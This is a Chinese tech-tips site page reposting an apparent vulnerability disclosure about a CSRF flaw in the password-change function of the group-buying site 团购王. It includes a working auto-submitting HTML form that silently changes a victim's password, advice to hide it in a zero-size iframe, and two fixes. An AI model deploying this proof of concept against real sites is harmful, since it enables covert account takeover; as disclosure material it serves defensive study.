欢迎登陆真网站,您的到来是我们的荣幸。 登陆 注册 忘记密码? ☆设为首页 △加入收藏
欢迎加入真幸福QQ群
电脑知识: 基础知识 网络技术 操作系统 办公软件 电脑维修 电脑安全 windows7 windows8 windows10 服务器教程 平板电脑 视频播放教程 网络应用 互联网 工具软件 浏览器教程 QQ技巧 输入法教程 影视制作 YY教程 wps教程 word教程 Excel教程 PowerPoint
云南西双版纳特产小花糯玉米真空包装


珍爱网任意劫持他人账号
盛大四个游戏商城XSS指哪打哪+URL重定向
有利网任意用户密码重置及修补
移动设备应用的灰盒测试
教你如何屏蔽弹窗
使用网银时电脑忽异常立刻:拔网线 断电源
黑客攻击常见方法及安全策略制订的思路
百度杀毒如何升级?
百度杀毒使用的是什么引擎?
AV-Test发布Windows 8杀毒软件评测报告
团购王csrf可劫持用户修改密码
【 来源:网络 】【 点击:1 】 【 发布时间:2017_03_03 08:59:59 】

   修改密码处无验证token,并且无验证原密码(一个涉及money的站,修改密码居然没有验证原密码!!!),可以通过一个精心构造的表单欺骗用户修改密码。

<html>
 
<body>
 
<form name="csrf" action="http://www.go.cn/index.php?m=settings" method="POST">
 
<input type=text name=password value="woooooooyun"></input>
<input type=text name=password2 value="woooooooyun"></input>
<input type=text name=do value="update"></input>
<input type="submit" value="submit" />
 
</form>
 
<script>
 
 document.csrf.submit();
 
</script>
 
</body>
 
</html>

  欺骗用户访问后,密码会被改成woooooooyun。

团购王csrf可劫持用户修改密码 三联

  直接让用户访问太明显了,直接会跳转到“修改成功”的页面,所以可以准备一个看似正常的页面(如新闻),然后iframe这个POC,并且height=0,width=0,用户就会在不知情的情况下被修改密码,后果可想而知了。

  修复方案:

  1.修改密码一定要验证原密码

  2.所有涉及用户信息的操作要验证随机的token.

本网站由川南居提供技术支持,fkzxf版权所有 浙ICP备12031891号
淳安分站 淳安分站